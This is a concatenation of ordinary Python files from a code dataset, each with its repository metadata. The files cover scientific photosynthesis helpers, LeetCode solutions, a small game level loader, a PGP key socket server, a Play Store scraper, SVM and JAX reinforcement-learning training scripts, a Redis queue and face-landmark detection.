iabs=1), with Jmax limitation\r\n        'vcmax_unitiabs': kphio * ftemp_kphio * out_optchi['mjoc'] * soilmstress,\r\n\r\n        # complement for non-smith19\r\n        'omega': np.full(leng, np.NaN),\r\n        'omega_star': np.full(leng, np.NaN)\r\n    }\r\n    return out\r\n\r\n\r\ndef calc_lue_vcmax_c4(kphio, ftemp_kphio, c_molmass, soilmstress):\r\n\r\n    if isinstance(kphio, float):\r\n        leng = 1\r\n    else:\r\n        leng = len(kphio)\r\n    out = {\r\n        # Light use efficiency (gpp per unit absorbed light)\r\n        'lue': kphio * ftemp_kphio * c_molmass * soilmstress,\r\n\r\n        # Vcmax normalised per unit absorbed PPFD (assuming iabs=1), with Jmax limitation\r\n        'vcmax_unitiabs': kphio * ftemp_kphio * soilmstress,\r\n\r\n        # complement for non-smith19\r\n        'omega': np.full(leng, np.NaN),\r\n        'omega_star': np.full(leng, np.NaN)\r\n    }\r\n    return out\r\n\r\n\r\ndef calc_chi_c4():\r\n    # //////////////////////////////////////////////////////////////////\r\n    # (Dummy-) ci:ca for C4 photosynthesis\r\n    # -----------------------------------------------------------------------\r\n    out = {'chi':9999, 'mc':1, 'mj':1, 'mjoc':1 }\r\n    return out\r\n\r\n\r\ndef calc_mprime(mc):\r\n    # -----------------------------------------------------------------------\r\n    # Input:  mc   (unitless): factor determining LUE\r\n    # Output: mpi (unitless): modified m accounting for the co-limitation\r\n    #         hypothesis after Prentice et al. (2014)\r\n    # -----------------------------------------------------------------------\r\n    kc = 0.41 # Jmax cost coefficient\r\n\r\n    mpi = mc**2 - kc**(2.0 / 3.0) * (mc**(4.0 / 3.0))\r\n\r\n    # Check for negatives:\r\n    if mpi > 0:\r\n        mpi = np.sqrt(mpi)\r\n    else:\r\n        mpi = np.NaN\r\n    return mpi\r\n\r\n\r\ndef co2_to_ca(co2, patm):\r\n\r\n    # -----------------------------------------------------------------------\r\n    # Input:    - float, annual atm. CO2, ppm (co2)\r\n    #           - float, monthly atm. pressure, Pa (patm)\r\n    # Output:   - ca in units of Pa\r\n    # Features: Converts ca (ambient CO2) from ppm to Pa.\r\n    # -----------------------------------------------------------------------\r\n    ca = 1.0e-6 * co2 * patm # Pa, atms. 
CO2\r\n return ca\r\n\r\n\r\ndef density_h2o(tc, p):\r\n\r\n # -----------------------------------------------------------------------\r\n # Input: - float, air temperature (tc), degrees C\r\n # - float, atmospheric pressure (p), Pa\r\n # Output: float, density of water, kg/m^3\r\n # Features: Calculates density of water at a given temperature and\r\n # pressure using the Tumlirz Equation\r\n # Ref: F.H. Fisher and O.E Dial, Jr. (1975) Equation of state of\r\n # pure water and sea water, Tech. Rept., Marine Physical\r\n # Laboratory, San Diego, CA.\r\n # -----------------------------------------------------------------------\r\n\r\n # Calculate lambda, (bar cm^3)/g:\r\n my_lambda = 1788.316 + 21.55053 * tc + -0.4695911 * tc * tc + 3.096363e-3 * tc * tc * tc + \\\r\n -7.341182e-6 * tc * tc * tc * tc\r\n\r\n # Calculate po, bar\r\n po = 5918.499 + 58.05267 * tc + -1.1253317 * tc * tc + 6.6123869e-3 * tc * tc * tc + \\\r\n -1.4661625e-5 * tc * tc * tc * tc\r\n\r\n # Calculate vinf, cm^3/g\r\n vinf = 0.6980547 + -7.435626e-4 * tc + 3.704258e-5 * tc * tc + -6.315724e-7 * tc * tc * tc + \\\r\n 9.829576e-9 * tc * tc * tc * tc + -1.197269e-10 * tc * tc * tc * tc * tc + \\\r\n 1.005461e-12 * tc * tc * tc * tc * tc * tc + \\\r\n -5.437898e-15 * tc * tc * tc * tc * tc * tc * tc + \\\r\n 1.69946e-17 * tc * tc * tc * tc * tc * tc * tc * tc + \\\r\n -2.295063e-20 * tc * tc * tc * tc * tc * tc * tc * tc * tc\r\n\r\n # Convert pressure to bars (1 bar <- 100000 Pa)\r\n pbar = 1e-5 * p\r\n\r\n # Calculate the specific volume (cm^3 g^-1):\r\n v = vinf + my_lambda / (po + pbar)\r\n\r\n # Convert to density (g cm^-3) -> 1000 g/kg; 1000000 cm^3/m^3 -> kg/m^3:\r\n rho = (1e3 / v)\r\n\r\n return rho\r\n\r\n\r\ndef calc_viscosity_h2o(tc, p):\r\n # -----------------------------------------------------------------------\r\n # Input: - float, ambient temperature (tc), degrees C\r\n # - float, ambient pressure (p), Pa\r\n # Return: float, viscosity of water (mu), Pa s\r\n # Features: Calculates viscosity of water at a given temperature and\r\n # pressure.\r\n # Depends: density_h2o\r\n # Ref: Huber, M. L., R. A. Perkins, A. Laesecke, D. G. Friend, J. V.\r\n # Sengers, M. J. Assael, ..., K. Miyagawa (2009) New\r\n # international formulation for the viscosity of H2O, J. Phys.\r\n # Chem. Ref. Data, Vol. 38(2), pp. 101-125.\r\n # -----------------------------------------------------------------------\r\n # Define reference temperature, density, and pressure values:\r\n tk_ast = 647.096 # Kelvin\r\n rho_ast = 322.0 # kg/m^3\r\n mu_ast = 1e-6 # Pa s\r\n\r\n # Get the density of water, kg/m^3\r\n rho = density_h2o(tc, p)\r\n\r\n # Calculate dimensionless parameters:\r\n tbar = (tc + 273.15) / tk_ast\r\n tbarx = tbar**0.5\r\n tbar2 = tbar**2\r\n tbar3 = tbar**3\r\n rbar = rho / rho_ast\r\n\r\n # Calculate mu0 (Eq. 11 & Table 2, Huber et al., 2009):\r\n mu0 = 1.67752 + 2.20462 / tbar + 0.6366564 / tbar2 - 0.241605 / tbar3\r\n mu0 = 1e2 * tbarx / mu0\r\n\r\n # Create Table 3, Huber et al. 
(2009):\r\n    h_array = np.zeros([7, 6])\r\n    h_array[0, :] = [0.520094, 0.0850895, -1.08374, -0.289555, 0.0, 0.0] # hj0\r\n    h_array[1, :] = [0.222531, 0.999115, 1.88797, 1.26613, 0.0, 0.120573] # hj1\r\n    h_array[2, :] = [-0.281378, -0.906851, -0.772479, -0.489837, -0.257040, 0.0] # hj2\r\n    h_array[3, :] = [0.161913, 0.257399, 0.0, 0.0, 0.0, 0.0] # hj3\r\n    h_array[4, :] = [-0.0325372, 0.0, 0.0, 0.0698452, 0.0, 0.0] # hj4\r\n    h_array[5, :] = [0.0, 0.0, 0.0, 0.0, 0.00872102, 0.0] # hj5\r\n    h_array[6, :] = [0.0, 0.0, 0.0, -0.00435673, 0.0, -0.000593264] # hj6\r\n\r\n    # Calculate mu1 (Eq. 12 & Table 3, Huber et al., 2009):\r\n    mu1 = 0.0\r\n    ctbar = (1.0 / tbar) - 1.0\r\n    # print(paste(\"ctbar\",ctbar))\r\n    # for i in xrange(6):\r\n    for i in range(0, 6):\r\n        # exponents start at 0 in this 0-indexed port of the 1-indexed R code (Eq. 12)\r\n        coef1 = ctbar**i\r\n        coef2 = 0.0\r\n        for j in range(0, 7):\r\n            coef2 = coef2 + h_array[j, i] * (rbar - 1.0) ** j\r\n        mu1 = mu1 + coef1 * coef2\r\n    mu1 = np.exp(rbar * mu1)\r\n    # print(paste(\"mu1\",mu1))\r\n\r\n    # Calculate mu_bar (Eq. 2, Huber et al., 2009)\r\n    #   assumes mu2 = 1\r\n    mu_bar = mu0 * mu1\r\n\r\n    # Calculate mu (Eq. 1, Huber et al., 2009)\r\n    mu = mu_bar * mu_ast # Pa s\r\n\r\n    return mu","repo_name":"jinmuluo/P-model","sub_path":"fuc.py","file_name":"fuc.py","file_ext":"py","file_size_in_byte":11723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
{"seq_id":"14182809131","text":"'''\r\nhash table\r\n\r\nRuntime: 180 ms, beats 15.66% of Python3 submissions\r\nMemory: 20.6 MB, beats 49.40% of Python3 submissions\r\nTest cases passed: 38 / 38\r\n'''\r\nfrom typing import List\r\nfrom collections import Counter, defaultdict\r\n\r\n\r\nclass Solution:\r\n    def findingUsersActiveMinutes(self, logs: List[List[int]], k: int) -> List[int]:\r\n        id2times = defaultdict(set)\r\n        for id, time in logs:\r\n            id2times[id].add(time)\r\n        freq = Counter(len(v) for v in id2times.values())\r\n        return [freq[i] for i in range(1, k + 1)]\r\n\r\n'''\r\nhash table\r\n\r\nRuntime: 100 ms, beats 84.34% of Python3 submissions\r\nMemory: 20.9 MB, beats 36.15% of Python3 submissions\r\nTest cases passed: 38 / 38\r\n'''\r\nclass Solution:\r\n    def findingUsersActiveMinutes(self, logs: List[List[int]], k: int) -> List[int]:\r\n        id2times = defaultdict(set)\r\n        for id, time in logs:\r\n            id2times[id].add(time)\r\n        ans = [0] * k\r\n        for id, times in id2times.items():\r\n            ans[len(times) - 1] += 1\r\n        return ans \r\n\r\n","repo_name":"lixiang2017/leetcode","sub_path":"leetcode-cn/1817.0_Finding_the_Users_Active_Minutes.py","file_name":"1817.0_Finding_the_Users_Active_Minutes.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
{"seq_id":"18525703763","text":"from levels.models import Level, Field, Hero, Object\n\n\ndef level(name, map):\n    _assert_map_format_is_valid(map)\n    width, height = len(map[0]), len(map)\n    x, y = 0, height-1\n    objects = {}\n\n    for line in map:\n        for char in line:\n            if char not in level_object_ctors:\n                x += 1\n                continue\n            object = create_level_object(x, y, char)\n            if object.name not in objects:\n                objects[object.name] = []\n            objects[object.name].append(object)\n            x += 1\n        y -= 1\n        x = 0\n\n    field = Field(width, height, objects)\n    return Level(name, field)\n\n\ndef _assert_map_format_is_valid(map):\n    assert type(map) == list, f'Map must be an array of strings but was a {type(map)}.'\n    assert all(type(line) == str for line in map), 'Map must be an array of strings.'\n    width, height = len(map[0]), len(map)\n    assert all(len(line) == width for line in map), 'Map mustn\\'t have varying width.'\n    assert width > 0 and height > 0, f'Map size ({width}, 
{height}) is invalid.'\n\n\ndef create_level_object(x, y, char):\n return level_object_ctors[char](x, y)\n\n\ndef level_to_json(level):\n if level.name in cached_level_jsons:\n return cached_level_jsons[level.name]\n\n objects_json = {}\n \n for object_list in level.field.objects.values():\n for object in object_list:\n if object.name == 'Hero' or object.name == 'Exit': \n continue\n position_json = f'{object.position.x},{object.position.y}'\n if position_json not in objects_json:\n objects_json[position_json] = []\n objects_json[position_json].append(object.name)\n\n cached_level_jsons[level.name] = {\n 'size': {\n 'width': level.field.width,\n 'height': level.field.height\n },\n 'hero': {\n 'x': level.field.hero.position.x,\n 'y': level.field.hero.position.y,\n },\n 'exit': {\n 'x': level.field.exit.position.x,\n 'y': level.field.exit.position.y,\n },\n 'objects': objects_json\n }\n\n return cached_level_jsons[level.name]\n\n\ncached_level_jsons = {}\n\nlevel_object_ctors = {\n 'H': lambda x, y: Hero(x, y),\n 'P': lambda x, y: Object('Puddle', x, y),\n 'E': lambda x, y: Object('Exit', x, y)\n}\n\nlevels = {\n 1: level('level1', [\n '...',\n '..E',\n 'H..',\n ]),\n 2: level('level2', [\n '...',\n '..E',\n 'P.P',\n 'H..',\n ]),\n 3: level('level3', [\n '..H',\n '.PP',\n '...',\n 'PPE',\n ])\n}","repo_name":"DmitryM210/beanie","sub_path":"beanie/levels/levels.py","file_name":"levels.py","file_ext":"py","file_size_in_byte":2624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"3392148433","text":"import socket\nimport pickle\nimport base64\nimport sys\nimport os\nfrom Crypto.Signature import PKCS1_v1_5\nfrom Crypto.Hash import SHA256\nfrom Crypto.PublicKey import RSA\n\ncurrent = os.path.dirname(os.path.realpath(__file__))\nparent = os.path.dirname(current)\nsys.path.append(parent)\nfrom pgp import PGP\n\n\nclass Server:\n def __init__(self, ip, port):\n # Create socket\n try:\n self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n except socket.error as err:\n print(\"socket creation failed with error %s\" % err)\n # Init socket params\n self.s.bind((ip, port))\n print(\"starting server on port \" + str(port))\n path = os.path.dirname(os.path.realpath(__file__)) + \"\\\\bin\"\n self.pgp = PGP(path)\n private_key_file = open(\"certtest/my_private.key\", \"rb\").read()\n self.private_key = RSA.importKey(private_key_file)\n self.signer = PKCS1_v1_5.new(self.private_key)\n # TEMP\n # client_public_key_file = open(\"certtest/my_public.key\", \"rb\").read()\n # client_public_key = RSA.importKey(client_public_key_file)\n # client_verifier = PKCS1_v1_5.new(client_public_key)\n #\n # test_string = \"Hello\"\n # test_hashed = SHA256.new(data=bytes(test_string, \"utf-8\"))\n # signature = self.signer.sign(test_hashed)\n # print(client_verifier.verify(test_hashed, signature))\n\n\n def listen(self):\n self.s.listen(1)\n\n def accept(self):\n conn, addr = self.s.accept()\n print('Connected by', addr)\n return conn, addr\n\n def listKeys(self):\n public = pickle.dumps(self.pgp.list_public_keys())\n private = pickle.dumps(self.pgp.list_private_keys())\n public = base64.b64encode(public).decode('ascii')\n private = base64.b64encode(private).decode('ascii')\n packet = \"list private %s endprivate public %s endpublic\" % (private, public)\n return packet\n\n def sendFile(self,path:str,id: str,conn: socket):\n size = os.path.getsize(path)\n path = os.path.abspath(path)\n\n msg = \"file %d %s\" % (size,id)\n print(\"sending %s size %d name 
%s\" % (path,size,id))\n conn.send(msg.encode())\n\n f = open(path, \"rb\")\n while True:\n data = f.read(1024)\n \n if data:\n conn.send(data)\n else:\n f.close()\n break\n\n\n def addKeys(self, data):\n try:\n if \"PUBLIC\" in data:\n key_start = data.find(\"-----BEGIN PGP PUBLIC KEY BLOCK-----\")\n key_end = data.find(\"-----END PGP PUBLIC KEY BLOCK-----\") + len(\"-----END PGP PUBLIC KEY BLOCK-----\")\n key_string = data[key_start:key_end]\n self.pgp.add_key(key_string)\n elif \"PRIVATE\" in data:\n key_start = data.find(\"-----BEGIN PGP PRIVATE KEY BLOCK-----\")\n key_end = data.find(\"-----END PGP PRIVATE KEY BLOCK-----\") + len(\"-----END PGP PRIVATE KEY BLOCK-----\")\n key_string = data[key_start:key_end]\n self.pgp.add_key(key_string)\n return \"OK\"\n except EOFError:\n return \"Incorrect input\"\n\n def prepare_signature(self, command, data):\n data_hashed = SHA256.new(data=bytes(data, \"utf-8\"))\n signature = self.signer.sign(data_hashed)\n packet = [command, data, signature]\n packet_string = pickle.dumps(packet)\n packet_string = base64.b64encode(packet_string).decode('ascii')\n return packet_string\n\n def connection(self, conn: socket, addr):\n while True:\n data = conn.recv(10000)\n if data:\n data = data.decode()\n if data[:4] == \"list\":\n keys = self.listKeys()\n packet_string = self.prepare_signature(\"list\", keys)\n conn.send(packet_string.encode())\n elif data[:4] == \"sign\":\n cert = \"pickle.\"\n self.pgp.sign(cert)\n elif data[:6] == \"verify\":\n self.pgp.verify()\n elif data[:3] == \"add\":\n res = self.addKeys(data)\n conn.send(res.encode())\n elif data[:4] == \"file\":\n data = data.split(\" \")\n if data[1]:\n path = os.path.dirname(os.path.realpath(__file__)) + \"\\\\files\\\\\"\n path = path + data[1]\n self.sendFile(path,data[1],conn);\n else:\n error = \"usage: file \"\n print(error)\n conn.send(error.encode())\n else:\n error = \"unexpected command %s\" % (data)\n print(error)\n conn.send(error.encode())\n else:\n print(\"Client quit, closing\", addr)\n conn.close()\n break","repo_name":"koaie/F20CN_CW2","sub_path":"server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":5019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"7016444692","text":"import play_scraper as scraper\nimport urllib.request\n\ndef scrapeCollectionScreenShots(collectionName):\n apps = scraper.collection(collection = collectionName)\n fileNameCount = 0\n for appDict in apps:\n currentAppID = appDict['app_id']\n\n currentAppDetailsDict = scraper.details(currentAppID)\n\n\n icoin = currentAppDetailsDict['icon']\n appName = currentAppDetailsDict['title']\n\n # if 'GAME' in currentAppDetailsDict['category']:\n # print('GameFound')\n # continue\n\n urllib.request.urlretrieve(icoin, \n appName+'.png')\n\n fileNameCount += 1\n\n\n \n\n\ndef scrapeDeveloperScreenShots(developerName):\n apps = scraper.developer(developerName, results = 120)\n\n fileNameCount = 0\n \n for appDict in apps:\n currentAppID = appDict['app_id']\n\n currentAppDetailsDict = scraper.details(currentAppID)\n\n\n screenshotList = currentAppDetailsDict['screenshots']\n\n for screenshoturl in screenshotList:\n urllib.request.urlretrieve(screenshoturl, \n 'material' + str(fileNameCount))\n\n fileNameCount += 1\n\n# scrapeDeveloperScreenShots('Google 
Inc.')\nscrapeCollectionScreenShots('TOP_PAID')\n\n\n\n","repo_name":"GautamBose/Deep-Learning-Workshop","sub_path":"playStoreScraper.py","file_name":"playStoreScraper.py","file_ext":"py","file_size_in_byte":1285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"23869351185","text":"import pandas as pd\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.svm import SVC\nimport pickle\nimport numpy as np\nimport argparse\n\n\n# Train model on full training set after best hyperparameters were selected with validation curve\n# The evaluation is afterwards done with evaluate_final_model.py\n\ndef trainSVM(train_on_average_features, C, gamma):\n print('Reading training data')\n df_train = pd.read_csv('./data/report_features_std_train.csv', sep='\\t')\n\n X_train = None\n if train_on_average_features:\n X_train = df_train.drop(['CIK', 'Ticker', 'Company', 'Filing_Date', 'Form_Type', 'Change_Ratio', 'Change_Nominal', 'File_Path'], axis=1).values[:, :768]\n else:\n X_train = df_train.drop(['CIK', 'Ticker', 'Company', 'Filing_Date', 'Form_Type', 'Change_Ratio', 'Change_Nominal', 'File_Path'], axis=1).values\n \n _, y_train = np.unique(df_train['Change_Nominal'].values, return_inverse=True)\n\n scaler = StandardScaler()\n scaler.fit(X_train)\n X_train = scaler.transform(X_train)\n\n print('Fitting on data...')\n model = SVC(kernel=\"rbf\", C=C, gamma=gamma, probability=True)\n model.fit(X_train, y_train)\n\n print('Saving model...')\n if train_on_average_features:\n with open('./data/svm_avg.pkl', 'wb') as fid:\n pickle.dump(model, fid)\n else:\n with open('./data/svm_std.pkl', 'wb') as fid:\n pickle.dump(model, fid)\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Select model path and name.')\n parser.add_argument('--train_on_average_features', dest='train_on_average_features', action='store_true')\n parser.add_argument('--C', dest='C', type=float)\n parser.add_argument('--gamma', dest='gamma', type=float)\n args = parser.parse_args()\n trainSVM(args.train_on_average_features, args.C, args.gamma)","repo_name":"FrederikBoehm/Bachelorarbeit_Code","sub_path":"classification/train_svm.py","file_name":"train_svm.py","file_ext":"py","file_size_in_byte":1847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"31911592990","text":"from pathlib import Path\n\nimport numpy as np\nimport pandas as pd\nfrom dash.dependencies import Input, Output\nfrom dash.exceptions import PreventUpdate\nimport plotly.graph_objects as go\n\nfrom vicinity.app import app\nfrom vicinity import core\n\n\n@app.callback([Output('table', 'data'), Output('table', 'columns')],\n Input('file_path', 'value'),\n Input('lat_degrees', 'value'),\n Input('lon_degrees', 'value'),\n Input('radius_km', 'value'))\ndef table_data_columns(file_path, lat_degrees, lon_degrees, radius_km):\n df = try_read_cached_csv(file_path)\n\n radius_km = parse_float(radius_km)\n if np.isnan(radius_km):\n radius_km = core.EARTH_DIAMETER_KM / 2.0\n\n lat_degrees = parse_float(lat_degrees)\n lon_degrees = parse_float(lon_degrees)\n if np.isnan(lat_degrees) or np.isnan(lon_degrees):\n return transform_df_into_dash_data_table(df)\n\n df = core.compute_vicinity(df, lat_degrees, lon_degrees, radius_km)\n return transform_df_into_dash_data_table(df)\n\n\ndef transform_df_into_dash_data_table(df):\n data = df.to_dict('records')\n columns = [{ 'name': c, 'id': c } for c in df]\n return data, columns\n\n\ndef 
try_read_cached_csv(file_path):\n test_df = core.read_cached_csv('data/siga-empreendimentos-geracao.csv')\n print(test_df)\n try:\n return core.read_cached_csv(file_path)\n except:\n raise PreventUpdate\n\n\ndef parse_float(value):\n try:\n return float(value)\n except:\n return np.nan","repo_name":"diogofriggo/vicinity","sub_path":"vicinity/logic.py","file_name":"logic.py","file_ext":"py","file_size_in_byte":1513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"14433568086","text":"import os, sys\nfrom codetiming import Timer\nimport jax\nimport jax.numpy as jnp\nimport chex\nimport haiku as hk\nfrom observable import Observable\nfrom omegaconf import OmegaConf\nimport hydra\nfrom modular_rollouts import create_env\nfrom evaluation import eval_rollouts\nfrom agents.agent import AgentOffPolicy\nfrom utils import check_env, get_uniform_action_sample_fct, ReplayBuffer\n\n# TODO : general reorganisation :\n# => More efficent main train function for pure jax ?\n# => If the replay buffer is moved inside the agent, it simplifies the genericity of the main loop\n\n\n@hydra.main(config_path=f\"{os.getcwd()}/configs/\", config_name=\"sac_gym.yaml\")\ndef train(hydra_config):\n ################ INIT ################\n cfg = OmegaConf.to_container(hydra_config, resolve=True)\n\n seed = cfg[\"seed\"]\n num_envs = cfg[\"env\"][\"num_envs\"]\n num_evals = cfg[\"env\"][\"num_eval\"]\n eval_every = cfg[\"env\"][\"eval_every\"]\n agent_cfg = cfg[\"train\"]\n total_train_step = agent_cfg[\"total_train_step\"]\n start_training_after_x_steps = agent_cfg[\"start_training_after_x_steps\"]\n max_replay_size = agent_cfg[\"max_replay_size\"]\n batch_size = agent_cfg[\"batch_size\"]\n grad_steps_per_step = agent_cfg[\"grad_steps_per_step\"]\n\n rng = hk.PRNGSequence(jax.random.PRNGKey(seed))\n\n # init env :\n env, eval_env = create_env(\n env_engine=cfg[\"env\"][\"env_engine\"],\n env_name=cfg[\"env\"][\"name\"],\n max_step=cfg[\"env\"][\"episode_max_length\"],\n n_eval_env=num_evals,\n n_train_env=num_envs,\n action_type=chex.Array,\n n_pop=1,\n seed=seed,\n )\n # check_env(env)\n first_obs, info = env.reset(seed=seed)\n\n # init agent :\n agent: AgentOffPolicy = hydra.utils.instantiate(\n cfg[\"train\"][\"agent\"], action_space=env.single_action_space\n )\n agent_state = agent.initialize(dummy_obs=first_obs, key=next(rng))\n\n # init logger :\n event = Observable()\n logger = hydra.utils.instantiate(\n cfg[\"log\"][\"logger\"], _recursive_=False, wandb_cfg=cfg\n )\n logger.register(event)\n\n # init replay buffer :\n action_shape = (\n 1 if env.single_action_space.shape == () else env.single_action_space.shape\n )\n dummy_step = (\n jnp.zeros(env.single_observation_space.shape), # obs_{t-1}\n jnp.zeros(action_shape), # action_{t-1}\n jnp.zeros(1), # reward_t\n jnp.zeros(env.single_observation_space.shape), # obs_t\n jnp.zeros(1), # terminated_t\n )\n replaybuffer = ReplayBuffer(\n max_replay_size=max_replay_size,\n dummy_data_sample=dummy_step,\n sample_batch_size=batch_size,\n )\n buffer_state = replaybuffer.init(next(rng))\n\n uniform_action = get_uniform_action_sample_fct(\n env.single_action_space, env.action_space\n )\n replaybuffer.sample = jax.jit(replaybuffer.sample)\n replaybuffer.insert = jax.jit(replaybuffer.insert)\n replaybuffer.vmap_sample = jax.jit(\n jax.vmap(replaybuffer.sample_with_key, in_axes=(None, 0))\n )\n\n ################ TRAIN ################\n\n n_step_done = 0\n obs = jnp.array(first_obs)\n while n_step_done <= 
total_train_step:\n # with jax.profiler.trace(\n # \"/tmp/jax-trace\",\n # create_perfetto_link=n_step_done > start_training_after_x_steps,\n # ):\n with Timer(name=\"action_selection\", logger=None):\n if n_step_done < start_training_after_x_steps:\n actions = uniform_action(next(rng))\n actor_output = {\"actions\": actions}\n else:\n agent_state, actor_output = agent.actor_step(\n agent_state=agent_state,\n obs=obs,\n key=next(rng),\n evaluation=False,\n )\n actions = actor_output.actions\n actor_output = actor_output._asdict()\n assert jnp.logical_and(-1 <= actions, actions <= 1).all()\n actions.block_until_ready()\n event.trigger(\n \"on_action_selection\",\n step=n_step_done,\n **actor_output,\n )\n with Timer(\"env_step\", logger=None):\n env_output = env.step(actions)\n env_output[0].block_until_ready()\n\n with Timer(\"replaybuffer_insert\", logger=None):\n new_obs, reward, terminated, truncated, info = env_output\n step_data = (obs, actions, reward, new_obs, terminated)\n buffer_state = replaybuffer.insert(buffer_state, step_data)\n buffer_state.data.block_until_ready()\n\n if (\n n_step_done > start_training_after_x_steps\n and replaybuffer.size(buffer_state) > batch_size\n ):\n with Timer(\"learn_step\", logger=None):\n if cfg[\"train\"].get(\"with_scan\", False):\n keys = jax.random.split(next(rng), grad_steps_per_step * num_envs)\n buffer_sample = replaybuffer.vmap_sample(buffer_state, keys)\n agent_state, learner_output = agent.learn_n_step(\n agent_state, buffer_sample, next(rng)\n )\n else:\n for _ in range(grad_steps_per_step * num_envs):\n buffer_state, buffer_sample = replaybuffer.sample(buffer_state)\n agent_state, learner_output = agent.learner_step(\n agent_state, buffer_sample, next(rng)\n )\n learner_output[0].block_until_ready()\n\n event.trigger(\"on_learn_step\", step=n_step_done, **learner_output._asdict())\n\n if n_step_done % eval_every == 0:\n with Timer(\"evaluation\", logger=None):\n crewards = eval_rollouts(eval_env, agent, agent_state, rng)\n crewards.block_until_ready()\n event.trigger(\n \"on_evaluation\",\n step=n_step_done,\n crewards=crewards,\n eval_every=eval_every,\n )\n obs = new_obs\n n_step_done += env.num_envs\n\n total = sum(Timer.timers.total(name) for name in Timer.timers.data)\n print(\"total timers : \", total)\n\n\nif __name__ == \"__main__\":\n from jax.config import config\n\n os.environ[\"XLA_PYTHON_CLIENT_PREALLOCATE\"] = \"false\"\n # config.update(\"jax_debug_nans\", True)\n # to remove once package created :\n sys.path.append(os.getcwd())\n\n train()\n","repo_name":"olivier-serris/ModularRollouts-Examples","sub_path":"rlax_tests/train_off_pol.py","file_name":"train_off_pol.py","file_ext":"py","file_size_in_byte":6441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"30621243036","text":"import logging\nfrom functools import wraps\n\nimport redis\nfrom redis.exceptions import ConnectionError\n\nfrom .exceptions import QueueConnectionError\n\nLOG = logging.getLogger(__name__)\n\n\ndef convert_conn_error(func):\n @wraps(func)\n def wrapper(*args, **kwargs):\n try:\n return func(*args, **kwargs)\n except ConnectionError:\n raise QueueConnectionError(\"Connection failed to redis\")\n return wrapper\n\n\nclass RedisQueue(object):\n \"\"\"Simple Queue with Redis Backend\n\n Borrowed from\n http://peter-hoffmann.com/2012/python-simple-queue-redis-queue.html\n (if found, please return)\n\n \"\"\"\n def __init__(self, name, namespace='taskd', conn=None, **redis_kwargs):\n 
\"\"\"The default connection parameters are:\n host='localhost', port=6379, db=0\n\n \"\"\"\n if conn:\n self.__db = conn\n else:\n self.__db = redis.StrictRedis(**redis_kwargs)\n self.key = '%s:%s' % (namespace, name)\n\n @convert_conn_error\n def qsize(self):\n \"\"\"Return the approximate size of the queue.\"\"\"\n return self.__db.llen(self.key)\n\n @convert_conn_error\n def empty(self):\n \"\"\"Return True if the queue is empty, False otherwise.\"\"\"\n return self.qsize() == 0\n\n @convert_conn_error\n def put(self, item):\n \"\"\"Put item into the queue.\"\"\"\n self.__db.rpush(self.key, item)\n\n @convert_conn_error\n def get(self, block=True, timeout=None):\n \"\"\"Remove and return an item from the queue.\n\n If optional args block is true and timeout is None (the default), block\n if necessary until an item is available.\n\n \"\"\"\n if block:\n item = self.__db.blpop(self.key, timeout=timeout)\n if item:\n item = item[1]\n else:\n item = self.__db.lpop(self.key)\n\n return item\n\n @convert_conn_error\n def get_nowait(self):\n return self.get(block=False)\n\n @convert_conn_error\n def clear(self):\n self.__db.delete(self.key)\n","repo_name":"vulcan-collaboration/vulcanforge","sub_path":"vulcanforge/taskd/queue.py","file_name":"queue.py","file_ext":"py","file_size_in_byte":2047,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"71171699442","text":"# import the necessary packages\nfrom imutils import face_utils\nimport numpy as np\nimport argparse\nimport imutils\nimport dlib\nimport cv2\nimport os\nfrom PIL import Image, ImageDraw\nfrom random import randint\nimport json\n\nIMG_WIDTH = 328\nIMG_HEIGHT = 406\n\ndef detect_face_parts(image):\n # construct the argument parser and parse the arguments\n '''ap = argparse.ArgumentParser()\n ap.add_argument(\"-p\", \"--shape-predictor\", required=True,\n \thelp=\"path to facial landmark predictor\")\n ap.add_argument(\"-i\", \"--image\", required=True,\n \thelp=\"path to input image\")\n args = vars(ap.parse_args())\n '''\n\n parts = {}\n # initialize dlib's face detector (HOG-based) and then create\n # the facial landmark predictor\n detector = dlib.get_frontal_face_detector()\n predictor = dlib.shape_predictor('shape_predictor_68_face_landmarks.dat')\n # load the input image, resize it, and convert it to grayscale\n #image = cv2.imread(pil_image)\n #image = np.array(pil_image)\n # Convert RGB to BGR\n #open_cv_image = open_cv_image[:, :, ::-1].copy()\n #image = imutils.resize(image, width=500)\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n # detect faces in the grayscale image\n rects = detector(gray, 1)\n # loop over the face detections\n for (i, rect) in enumerate(rects):\n \t# determine the facial landmarks for the face region, then\n \t# convert the landmark (x, y)-coordinates to a NumPy array\n \tshape = predictor(gray, rect)\n \tshape = face_utils.shape_to_np(shape)\n \t# loop over the face parts individually\n \tfor (name, (i, j)) in face_utils.FACIAL_LANDMARKS_IDXS.items():\n pos = cv2.boundingRect(np.array([shape[i:j]]))\n parts[name] = {\n 'shape': [[int(p[0]), int(p[1])] for p in shape[i:j]],\n 'rect': (pos[0], pos[1], pos[0] + pos[2], pos[1] + pos[3])\n }\n\n \t\t# clone the original image so we can draw on it, then\n \t\t# display the name of the face part on the image\n \t\t#clone = image.copy()\n \t\t#cv2.putText(clone, name, (10, 30), cv2.FONT_HERSHEY_SIMPLEX,\n \t\t#\t0.7, (0, 0, 255), 2)\n \t\t# loop over the subset of facial landmarks, drawing the\n 
